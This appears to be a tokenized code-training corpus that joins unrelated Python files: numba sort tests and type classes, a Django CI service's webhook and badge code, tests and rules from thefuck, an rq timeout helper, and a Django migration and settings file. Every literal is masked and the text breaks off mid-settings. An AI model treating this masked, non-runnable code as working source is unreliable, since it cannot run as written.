random ( size = size ) < <NUM_LIT:0.1> ] = float ( '<STR_LIT>' ) <EOL> self . check_sort_inplace ( pyfunc , cfunc , orig ) <EOL> def test_np_sort_int ( self ) : <EOL> pyfunc = np_sort_usecase <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> for size in ( <NUM_LIT:5> , <NUM_LIT:20> , <NUM_LIT:50> , <NUM_LIT> ) : <EOL> orig = np . random . randint ( <NUM_LIT> , size = size ) <EOL> self . check_sort_copy ( pyfunc , cfunc , orig ) <EOL> def test_np_sort_float ( self ) : <EOL> pyfunc = np_sort_usecase <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> for size in ( <NUM_LIT:5> , <NUM_LIT:20> , <NUM_LIT:50> , <NUM_LIT> ) : <EOL> orig = np . random . random ( size = size ) * <NUM_LIT:100> <EOL> orig [ np . random . random ( size = size ) < <NUM_LIT:0.1> ] = float ( '<STR_LIT>' ) <EOL> self . check_sort_copy ( pyfunc , cfunc , orig ) <EOL> class TestPythonSort ( TestCase ) : <EOL> @ tag ( '<STR_LIT>' ) <EOL> def test_list_sort ( self ) : <EOL> pyfunc = list_sort_usecase <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> for size in ( <NUM_LIT:20> , <NUM_LIT:50> , <NUM_LIT> ) : <EOL> orig , ret = cfunc ( size ) <EOL> self . assertEqual ( sorted ( orig ) , ret ) <EOL> self . assertNotEqual ( orig , ret ) <EOL> def test_list_sort_reverse ( self ) : <EOL> pyfunc = list_sort_reverse_usecase <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> for size in ( <NUM_LIT:20> , <NUM_LIT:50> , <NUM_LIT> ) : <EOL> for b in ( False , True ) : <EOL> orig , ret = cfunc ( size , b ) <EOL> self . assertEqual ( sorted ( orig , reverse = b ) , ret ) <EOL> self . assertNotEqual ( orig , ret ) <EOL> def test_sorted ( self ) : <EOL> pyfunc = sorted_usecase <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> for size in ( <NUM_LIT:20> , <NUM_LIT:50> , <NUM_LIT> ) : <EOL> orig = np . random . random ( size = size ) * <NUM_LIT:100> <EOL> expected = sorted ( orig ) <EOL> got = cfunc ( orig ) <EOL> self . assertPreciseEqual ( got , expected ) <EOL> self . 
assertNotEqual ( list ( orig ) , got ) <EOL> def test_sorted_reverse ( self ) : <EOL> pyfunc = sorted_reverse_usecase <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> size = <NUM_LIT:20> <EOL> orig = np . random . random ( size = size ) * <NUM_LIT:100> <EOL> for b in ( False , True ) : <EOL> expected = sorted ( orig , reverse = b ) <EOL> got = cfunc ( orig , b ) <EOL> self . assertPreciseEqual ( got , expected ) <EOL> self . assertNotEqual ( list ( orig ) , got ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from __future__ import print_function , division , absolute_import <EOL> from abc import ABCMeta , abstractmethod , abstractproperty <EOL> import itertools <EOL> import weakref <EOL> import numpy <EOL> from . . six import add_metaclass <EOL> from . . utils import cached_property <EOL> _typecodes = itertools . count ( ) <EOL> def _autoincr ( ) : <EOL> n = next ( _typecodes ) <EOL> assert n < <NUM_LIT:2> ** <NUM_LIT:32> , "<STR_LIT>" <EOL> return n <EOL> _typecache = { } <EOL> def _on_type_disposal ( wr , _pop = _typecache . pop ) : <EOL> _pop ( wr , None ) <EOL> class _TypeMetaclass ( ABCMeta ) : <EOL> """<STR_LIT>""" <EOL> def _intern ( cls , inst ) : <EOL> wr = weakref . ref ( inst , _on_type_disposal ) <EOL> orig = _typecache . get ( wr ) <EOL> orig = orig and orig ( ) <EOL> if orig is not None : <EOL> return orig <EOL> else : <EOL> inst . _code = _autoincr ( ) <EOL> _typecache [ wr ] = wr <EOL> return inst <EOL> def __call__ ( cls , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> inst = type . __call__ ( cls , * args , ** kwargs ) <EOL> return cls . _intern ( inst ) <EOL> def _type_reconstructor ( reconstructor , reconstructor_args , state ) : <EOL> """<STR_LIT>""" <EOL> obj = reconstructor ( * reconstructor_args ) <EOL> if state : <EOL> obj . __dict__ . update ( state ) <EOL> return type ( obj ) . _intern ( obj ) <EOL> @ add_metaclass ( _TypeMetaclass ) <EOL> class Type ( object ) : <EOL> """<STR_LIT>""" <EOL> mutable = False <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> @ property <EOL> def key ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . name <EOL> def __repr__ ( self ) : <EOL> return self . name <EOL> def __hash__ ( self ) : <EOL> return hash ( self . key ) <EOL> def __eq__ ( self , other ) : <EOL> return self . __class__ is other . __class__ and self . key == other . 
key <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> def __reduce__ ( self ) : <EOL> reconstructor , args , state = super ( Type , self ) . __reduce__ ( ) <EOL> return ( _type_reconstructor , ( reconstructor , args , state ) ) <EOL> def unify ( self , typingctx , other ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def can_convert_to ( self , typingctx , other ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def can_convert_from ( self , typingctx , other ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def is_precise ( self ) : <EOL> """<STR_LIT>""" <EOL> return True <EOL> def augment ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def __call__ ( self , * args ) : <EOL> from . . typing import signature <EOL> if len ( args ) == <NUM_LIT:1> and not isinstance ( args [ <NUM_LIT:0> ] , Type ) : <EOL> return self . cast_python_value ( args [ <NUM_LIT:0> ] ) <EOL> return signature ( self , <EOL> * args ) <EOL> def __getitem__ ( self , args ) : <EOL> """<STR_LIT>""" <EOL> from . import Array <EOL> ndim , layout = self . _determine_array_spec ( args ) <EOL> return Array ( dtype = self , ndim = ndim , layout = layout ) <EOL> def _determine_array_spec ( self , args ) : <EOL> if isinstance ( args , ( tuple , list ) ) : <EOL> ndim = len ( args ) <EOL> if args [ <NUM_LIT:0> ] . step == <NUM_LIT:1> : <EOL> layout = '<STR_LIT:F>' <EOL> elif args [ - <NUM_LIT:1> ] . step == <NUM_LIT:1> : <EOL> layout = '<STR_LIT:C>' <EOL> else : <EOL> layout = '<STR_LIT:A>' <EOL> elif isinstance ( args , slice ) : <EOL> ndim = <NUM_LIT:1> <EOL> if args . 
step == <NUM_LIT:1> : <EOL> layout = '<STR_LIT:C>' <EOL> else : <EOL> layout = '<STR_LIT:A>' <EOL> else : <EOL> ndim = <NUM_LIT:1> <EOL> layout = '<STR_LIT:A>' <EOL> return ndim , layout <EOL> def cast_python_value ( self , args ) : <EOL> raise NotImplementedError <EOL> class Dummy ( Type ) : <EOL> """<STR_LIT>""" <EOL> class Hashable ( Type ) : <EOL> """<STR_LIT>""" <EOL> class Number ( Hashable ) : <EOL> """<STR_LIT>""" <EOL> def unify ( self , typingctx , other ) : <EOL> """<STR_LIT>""" <EOL> from . . import numpy_support <EOL> if isinstance ( other , Number ) : <EOL> a = numpy_support . as_dtype ( self ) <EOL> b = numpy_support . as_dtype ( other ) <EOL> sel = numpy . promote_types ( a , b ) <EOL> return numpy_support . from_dtype ( sel ) <EOL> class Callable ( Type ) : <EOL> """<STR_LIT>""" <EOL> @ abstractmethod <EOL> def get_call_type ( self , context , args , kws ) : <EOL> """<STR_LIT>""" <EOL> @ abstractmethod <EOL> def get_call_signatures ( self ) : <EOL> """<STR_LIT>""" <EOL> class DTypeSpec ( Type ) : <EOL> """<STR_LIT>""" <EOL> @ abstractproperty <EOL> def dtype ( self ) : <EOL> """<STR_LIT>""" <EOL> class IterableType ( Type ) : <EOL> """<STR_LIT>""" <EOL> @ abstractproperty <EOL> def iterator_type ( self ) : <EOL> """<STR_LIT>""" <EOL> class IteratorType ( IterableType ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , ** kwargs ) : <EOL> super ( IteratorType , self ) . 
__init__ ( name , ** kwargs ) <EOL> @ abstractproperty <EOL> def yield_type ( self ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def iterator_type ( self ) : <EOL> return self <EOL> class Container ( IterableType ) : <EOL> """<STR_LIT>""" <EOL> class Sequence ( Container ) : <EOL> """<STR_LIT>""" <EOL> class MutableSequence ( Sequence ) : <EOL> """<STR_LIT>""" <EOL> class ArrayCompatible ( Type ) : <EOL> """<STR_LIT>""" <EOL> array_priority = <NUM_LIT:0.0> <EOL> @ abstractproperty <EOL> def as_array ( self ) : <EOL> """<STR_LIT>""" <EOL> @ cached_property <EOL> def ndim ( self ) : <EOL> return self . as_array . ndim <EOL> @ cached_property <EOL> def layout ( self ) : <EOL> return self . as_array . layout <EOL> @ cached_property <EOL> def dtype ( self ) : <EOL> return self . as_array . dtype </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import warnings <EOL> from . import config <EOL> from numba . config import PYVERSION <EOL> from unittest import * </s>
<s> from django . core . urlresolvers import reverse <EOL> from django . shortcuts import redirect <EOL> from django . contrib . auth import logout <EOL> def logout_with_redirect ( request ) : <EOL> """<STR_LIT>""" <EOL> logout ( request ) <EOL> return redirect ( reverse ( '<STR_LIT>' ) ) </s>
<s> from django . http import Http404 <EOL> from django . conf import settings <EOL> from django_rq import enqueue <EOL> from tastypie . resources import Resource <EOL> from tastypie import fields <EOL> from projects . models import Project <EOL> from . models import NodeTask <EOL> from . jobs import run_node_task <EOL> from . utils import logger <EOL> class NodeTaskHookResource ( Resource ) : <EOL> """<STR_LIT>""" <EOL> before = fields . CharField ( ) <EOL> after = fields . CharField ( ) <EOL> ref = fields . CharField ( ) <EOL> commits = fields . ListField ( ) <EOL> repository = fields . DictField ( ) <EOL> class Meta : <EOL> allowed_methods = [ '<STR_LIT>' ] <EOL> resource_name = '<STR_LIT>' <EOL> def obj_create ( self , bundle , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( '<STR_LIT>' . format ( bundle . data [ '<STR_LIT>' ] ) ) <EOL> project = self . _get_project ( bundle ) <EOL> self . _create_task ( bundle , project ) <EOL> def _create_task ( self , bundle , project ) : <EOL> """<STR_LIT>""" <EOL> task = NodeTask . objects . create ( <EOL> project = project , <EOL> revision = bundle . data [ '<STR_LIT>' ] , <EOL> branch = self . _get_branch ( bundle . data [ '<STR_LIT>' ] ) , <EOL> ) <EOL> enqueue ( <EOL> run_node_task , args = ( task . id , ) , <EOL> timeout = settings . NODE_MAX_WAIT_TIME , <EOL> ) <EOL> def _get_project ( self , bundle ) : <EOL> """<STR_LIT>""" <EOL> project_name = '<STR_LIT>' . format ( <EOL> bundle . data [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] , <EOL> bundle . data [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] , <EOL> ) <EOL> try : <EOL> return Project . objects . get ( <EOL> name = project_name , is_enabled = True , run_here = True , <EOL> ) <EOL> except Project . DoesNotExist : <EOL> logger . warning ( <EOL> '<STR_LIT>' . <EOL> format ( project_name ) , <EOL> ) <EOL> raise Http404 ( '<STR_LIT>' ) <EOL> def _get_branch ( self , ref ) : <EOL> """<STR_LIT>""" <EOL> return ref . replace ( '<STR_LIT>' , '<STR_LIT>' ) </s>
<s> import sure <EOL> from django . test import TestCase <EOL> from tools . mongo import MongoFlushMixin <EOL> from tasks . exceptions import TaskDoesNotExists <EOL> from tasks . models import Tasks <EOL> from tasks . const import STATUS_SUCCESS , STATUS_FAILED <EOL> from . . forms import FindTaskForBadgeForm <EOL> from . import factories <EOL> from tools . tests import MockGithubMixin <EOL> class FindTaskForBadgeFormCase ( MockGithubMixin , MongoFlushMixin , TestCase ) : <EOL> """<STR_LIT>""" <EOL> mongo_flush = [ '<STR_LIT>' ] <EOL> def setUp ( self ) : <EOL> super ( FindTaskForBadgeFormCase , self ) . setUp ( ) <EOL> self . project = factories . ProjectFactory ( ) <EOL> def _get_form ( self , ** kwargs ) : <EOL> defaults = { <EOL> '<STR_LIT>' : self . project . name , <EOL> } <EOL> defaults . update ( kwargs ) <EOL> form = FindTaskForBadgeForm ( defaults ) <EOL> form . is_valid ( ) . should . be . true <EOL> return form <EOL> def _create_task ( self , ** kwargs ) : <EOL> defaults = { <EOL> '<STR_LIT>' : self . project . name , <EOL> '<STR_LIT:status>' : STATUS_SUCCESS , <EOL> } <EOL> defaults . update ( kwargs ) <EOL> return Tasks . save ( defaults ) <EOL> def test_task_not_found ( self ) : <EOL> """<STR_LIT>""" <EOL> form = self . _get_form ( ) <EOL> form . get_task . when . called_with ( ) . should . throw ( TaskDoesNotExists ) <EOL> def test_find_by_project ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _create_task ( ) <EOL> form = self . _get_form ( ) <EOL> form . get_task ( ) [ '<STR_LIT:status>' ] . should . be . equal ( STATUS_SUCCESS ) <EOL> def test_find_by_commit ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _create_task ( status = STATUS_FAILED , commit = { '<STR_LIT>' : '<STR_LIT:test>' } ) <EOL> for n in range ( <NUM_LIT:10> ) : <EOL> self . _create_task ( commit = { '<STR_LIT>' : '<STR_LIT>' . format ( n ) } ) <EOL> form = self . _get_form ( commit = '<STR_LIT:test>' ) <EOL> form . get_task ( ) [ '<STR_LIT:status>' ] . should . be . 
equal ( STATUS_FAILED ) <EOL> def test_find_by_branch ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _create_task ( status = STATUS_FAILED , commit = { '<STR_LIT>' : '<STR_LIT:test>' } ) <EOL> for n in range ( <NUM_LIT:10> ) : <EOL> self . _create_task ( commit = { '<STR_LIT>' : '<STR_LIT>' . format ( n ) } ) <EOL> form = self . _get_form ( branch = '<STR_LIT:test>' ) <EOL> form . get_task ( ) [ '<STR_LIT:status>' ] . should . be . equal ( STATUS_FAILED ) </s>
<s> from pymongo import ASCENDING <EOL> from django . core . management . base import BaseCommand <EOL> from tasks . models import Tasks <EOL> from tasks . jobs import create_task <EOL> class Command ( BaseCommand ) : <EOL> help = '<STR_LIT>' <EOL> def handle ( self , * args , ** kwargs ) : <EOL> for task in Tasks . find ( { } , sort = [ ( '<STR_LIT>' , ASCENDING ) ] ) : <EOL> try : <EOL> create_task ( task [ '<STR_LIT>' ] ) <EOL> except Exception as e : <EOL> print e </s>
<s> import re <EOL> from django . template . loader import render_to_string <EOL> from tasks . const import STATUS_SUCCESS , STATUS_FAILED <EOL> from . base import library <EOL> @ library . register ( '<STR_LIT>' ) <EOL> def testem_violation ( data ) : <EOL> """<STR_LIT>""" <EOL> lines = data [ '<STR_LIT>' ] . split ( '<STR_LIT:\n>' ) <EOL> runs = [ ] <EOL> tests = <NUM_LIT:0> <EOL> pass_ = <NUM_LIT:0> <EOL> fail = <NUM_LIT:0> <EOL> not_ok = False <EOL> for line in lines : <EOL> ok_match = re . match ( r'<STR_LIT>' , line ) <EOL> if ok_match : <EOL> runs . append ( ok_match . groups ( ) + ( [ ] , ) ) <EOL> if ok_match . groups ( ) [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> not_ok = True <EOL> if not len ( line ) : <EOL> not_ok = False <EOL> if not_ok and line . find ( '<STR_LIT:U+0020>' ) == <NUM_LIT:0> : <EOL> runs [ - <NUM_LIT:1> ] [ - <NUM_LIT:1> ] . append ( line [ <NUM_LIT:8> : ] ) <EOL> if line . find ( '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> tests = int ( line . split ( '<STR_LIT:U+0020>' ) [ - <NUM_LIT:1> ] ) <EOL> if line . find ( '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> pass_ = int ( line . split ( '<STR_LIT:U+0020>' ) [ - <NUM_LIT:1> ] ) <EOL> if line . find ( '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> fail = int ( line . split ( '<STR_LIT:U+0020>' ) [ - <NUM_LIT:1> ] ) <EOL> data [ '<STR_LIT:status>' ] = STATUS_SUCCESS if fail == <NUM_LIT:0> else STATUS_FAILED <EOL> data [ '<STR_LIT>' ] = render_to_string ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : tests , <EOL> '<STR_LIT>' : pass_ , <EOL> '<STR_LIT>' : fail , <EOL> } ) <EOL> data [ '<STR_LIT>' ] = render_to_string ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : tests , <EOL> '<STR_LIT>' : pass_ , <EOL> '<STR_LIT>' : fail , <EOL> '<STR_LIT>' : runs , <EOL> } ) <EOL> data [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : tests , <EOL> '<STR_LIT>' : pass_ , <EOL> '<STR_LIT>' : fail , <EOL> } <EOL> data [ '<STR_LIT>' ] = ( pass_ * <NUM_LIT:100> ) / tests if tests else <NUM_LIT:100> <EOL> return data </s>
<s> from io import BytesIO <EOL> import pytest <EOL> from tests . utils import Command <EOL> from thefuck . rules . apt_invalid_operation import match , get_new_command , _get_operations <EOL> invalid_operation = '<STR_LIT>' . format <EOL> apt_help = b'''<STR_LIT>''' <EOL> apt_operations = [ '<STR_LIT:list>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> apt_get_help = b'''<STR_LIT>''' <EOL> apt_get_operations = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:source>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ <EOL> ( '<STR_LIT>' , invalid_operation ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , invalid_operation ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , invalid_operation ( '<STR_LIT>' ) ) ] ) <EOL> def test_match ( script , stderr ) : <EOL> assert match ( Command ( script , stderr = stderr ) ) <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ <EOL> ( '<STR_LIT>' , invalid_operation ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , "<STR_LIT>" ) ] ) <EOL> def test_not_match ( script , stderr ) : <EOL> assert not match ( Command ( script , stderr = stderr ) ) <EOL> @ pytest . fixture <EOL> def set_help ( mocker ) : <EOL> mock = mocker . patch ( '<STR_LIT>' ) <EOL> def _set_text ( text ) : <EOL> mock . return_value . stdout = BytesIO ( text ) <EOL> return _set_text <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ <EOL> ( '<STR_LIT>' , apt_help , apt_operations ) , <EOL> ( '<STR_LIT>' , apt_get_help , apt_get_operations ) <EOL> ] ) <EOL> def test_get_operations ( set_help , app , help_text , operations ) : <EOL> set_help ( help_text ) <EOL> assert _get_operations ( app ) == operations <EOL> @ pytest . mark . 
parametrize ( '<STR_LIT>' , [ <EOL> ( '<STR_LIT>' , invalid_operation ( '<STR_LIT>' ) , <EOL> apt_get_help , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , invalid_operation ( '<STR_LIT>' ) , <EOL> apt_help , '<STR_LIT>' ) , <EOL> ] ) <EOL> def test_get_new_command ( set_help , stderr , script , help_text , result ) : <EOL> set_help ( help_text ) <EOL> assert get_new_command ( Command ( script , stderr = stderr ) ) [ <NUM_LIT:0> ] == result </s>
<s> import pytest <EOL> from thefuck . rules . git_pull import match , get_new_command <EOL> from tests . utils import Command <EOL> @ pytest . fixture <EOL> def stderr ( ) : <EOL> return '''<STR_LIT>''' <EOL> def test_match ( stderr ) : <EOL> assert match ( Command ( '<STR_LIT>' , stderr = stderr ) ) <EOL> assert not match ( Command ( '<STR_LIT>' ) ) <EOL> assert not match ( Command ( '<STR_LIT>' , stderr = stderr ) ) <EOL> def test_get_new_command ( stderr ) : <EOL> assert get_new_command ( Command ( '<STR_LIT>' , stderr = stderr ) ) == "<STR_LIT>" </s>
<s> import pytest <EOL> from thefuck . rules . no_such_file import match , get_new_command <EOL> from tests . utils import Command <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ <EOL> Command ( script = '<STR_LIT>' , stderr = "<STR_LIT>" ) , <EOL> Command ( script = '<STR_LIT>' , stderr = "<STR_LIT>" ) , <EOL> ] ) <EOL> def test_match ( command ) : <EOL> assert match ( command ) <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ <EOL> Command ( script = '<STR_LIT>' , stderr = "<STR_LIT>" ) , <EOL> Command ( script = '<STR_LIT>' , stderr = "<STR_LIT>" ) , <EOL> ] ) <EOL> def test_not_match ( command ) : <EOL> assert not match ( command ) <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ <EOL> ( Command ( script = '<STR_LIT>' , stderr = "<STR_LIT>" ) , '<STR_LIT>' ) , <EOL> ( Command ( script = '<STR_LIT>' , stderr = "<STR_LIT>" ) , '<STR_LIT>' ) , <EOL> ] ) <EOL> def test_get_new_command ( command , new_command ) : <EOL> assert get_new_command ( command ) == new_command </s>
<s> import pytest <EOL> from thefuck . shells . tcsh import Tcsh <EOL> @ pytest . mark . usefixtures ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class TestTcsh ( object ) : <EOL> @ pytest . fixture <EOL> def shell ( self ) : <EOL> return Tcsh ( ) <EOL> @ pytest . fixture ( autouse = True ) <EOL> def Popen ( self , mocker ) : <EOL> mock = mocker . patch ( '<STR_LIT>' ) <EOL> mock . return_value . stdout . read . return_value = ( <EOL> b'<STR_LIT>' <EOL> b'<STR_LIT>' <EOL> b'<STR_LIT>' <EOL> b'<STR_LIT>' ) <EOL> return mock <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> def test_from_shell ( self , before , after , shell ) : <EOL> assert shell . from_shell ( before ) == after <EOL> def test_to_shell ( self , shell ) : <EOL> assert shell . to_shell ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_and_ ( self , shell ) : <EOL> assert shell . and_ ( '<STR_LIT>' , '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_get_aliases ( self , shell ) : <EOL> assert shell . get_aliases ( ) == { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:l>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> def test_app_alias ( self , shell ) : <EOL> assert '<STR_LIT>' in shell . app_alias ( '<STR_LIT>' ) <EOL> assert '<STR_LIT>' in shell . app_alias ( '<STR_LIT>' ) <EOL> assert '<STR_LIT>' in shell . app_alias ( '<STR_LIT>' ) <EOL> def test_get_history ( self , history_lines , shell ) : <EOL> history_lines ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> assert list ( shell . get_history ( ) ) == [ '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> import re <EOL> from thefuck . utils import for_app <EOL> from thefuck . specific . sudo import sudo_support <EOL> from thefuck . shells import shell <EOL> @ sudo_support <EOL> @ for_app ( '<STR_LIT>' ) <EOL> def match ( command ) : <EOL> return ( ( '<STR_LIT>' in command . stderr . lower ( ) <EOL> or '<STR_LIT>' in command . stderr . lower ( ) <EOL> or '<STR_LIT>' in command . stderr . lower ( ) ) ) <EOL> @ sudo_support <EOL> def get_new_command ( command ) : <EOL> repl = shell . and_ ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return re . sub ( r'<STR_LIT>' , repl , command . script ) </s>
<s> from thefuck . utils import replace_argument <EOL> from thefuck . specific . git import git_support <EOL> @ git_support <EOL> def match ( command ) : <EOL> return ( '<STR_LIT>' in command . script and '<STR_LIT>' in command . stderr ) <EOL> def get_new_command ( command ) : <EOL> return replace_argument ( command . script , '<STR_LIT>' , '<STR_LIT>' ) <EOL> enabled_by_default = True </s>
<s> import re <EOL> from thefuck . utils import replace_argument , for_app <EOL> from thefuck . specific . sudo import sudo_support <EOL> @ sudo_support <EOL> @ for_app ( '<STR_LIT>' ) <EOL> def match ( command ) : <EOL> return ( '<STR_LIT>' in command . script and <EOL> '<STR_LIT>' in command . stderr and <EOL> '<STR_LIT>' in command . stderr ) <EOL> def get_new_command ( command ) : <EOL> broken_cmd = re . findall ( r'<STR_LIT>' , <EOL> command . stderr ) [ <NUM_LIT:0> ] <EOL> new_cmd = re . findall ( r'<STR_LIT>' , command . stderr ) [ <NUM_LIT:0> ] <EOL> return replace_argument ( command . script , broken_cmd , new_cmd ) </s>
<s> import subprocess <EOL> from . . utils import memoize , which <EOL> brew_available = bool ( which ( '<STR_LIT>' ) ) <EOL> @ memoize <EOL> def get_brew_path_prefix ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return subprocess . check_output ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> universal_newlines = True ) . strip ( ) <EOL> except : <EOL> return None </s>
<s> VERSION = '<STR_LIT:1.0>' </s>
<s> from __future__ import ( absolute_import , division , print_function , <EOL> unicode_literals ) <EOL> import signal <EOL> class JobTimeoutException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class BaseDeathPenalty ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , timeout ) : <EOL> self . _timeout = timeout <EOL> def __enter__ ( self ) : <EOL> self . setup_death_penalty ( ) <EOL> def __exit__ ( self , type , value , traceback ) : <EOL> try : <EOL> self . cancel_death_penalty ( ) <EOL> except JobTimeoutException : <EOL> pass <EOL> return False <EOL> def setup_death_penalty ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def cancel_death_penalty ( self ) : <EOL> raise NotImplementedError ( ) <EOL> class UnixSignalDeathPenalty ( BaseDeathPenalty ) : <EOL> def handle_death_penalty ( self , signum , frame ) : <EOL> raise JobTimeoutException ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( self . _timeout ) ) <EOL> def setup_death_penalty ( self ) : <EOL> """<STR_LIT>""" <EOL> signal . signal ( signal . SIGALRM , self . handle_death_penalty ) <EOL> signal . alarm ( self . _timeout ) <EOL> def cancel_death_penalty ( self ) : <EOL> """<STR_LIT>""" <EOL> signal . alarm ( <NUM_LIT:0> ) <EOL> signal . signal ( signal . SIGALRM , signal . SIG_DFL ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> from django . conf import settings <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> migrations . swappable_dependency ( settings . AUTH_USER_MODEL ) , <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = True , help_text = b'<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( help_text = b'<STR_LIT>' , auto_now_add = True ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( help_text = b'<STR_LIT>' , auto_now = True ) ) , <EOL> ( '<STR_LIT>' , models . FileField ( help_text = b'<STR_LIT>' , upload_to = b'<STR_LIT>' , verbose_name = b'<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( help_text = b'<STR_LIT>' , max_length = <NUM_LIT:255> ) ) , <EOL> ( '<STR_LIT>' , models . TextField ( help_text = b'<STR_LIT>' , null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . TextField ( ) ) , <EOL> ( '<STR_LIT>' , models . TextField ( help_text = b'<STR_LIT>' , null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:64> , null = True ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( related_name = '<STR_LIT>' , to = settings . AUTH_USER_MODEL , help_text = b'<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( related_name = '<STR_LIT>' , to = settings . AUTH_USER_MODEL , help_text = b'<STR_LIT>' ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> ) , <EOL> ] </s>
<s> DEBUG = True <EOL> TEMPLATE_DEBUG = DEBUG <EOL> ADMINS = ( <EOL> ) <EOL> MANAGERS = ADMINS <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> TIME_ZONE = '<STR_LIT>' <EOL> USER_TIME_ZONE = '<STR_LIT>' <EOL> USE_TZ = True <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> SITE_ID = <NUM_LIT:1> <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> MEDIA_ROOT = '<STR_LIT>' <EOL> MEDIA_URL = '<STR_LIT>' <EOL> STATIC_ROOT = '<STR_LIT>' <EOL> STATIC_URL = '<STR_LIT>' <EOL> ADMIN_MEDIA_PREFIX = '<STR_LIT>' <EOL> STATICFILES_DIRS = ( <EOL> ) <EOL> STATICFILES_FINDERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> SECRET_KEY = 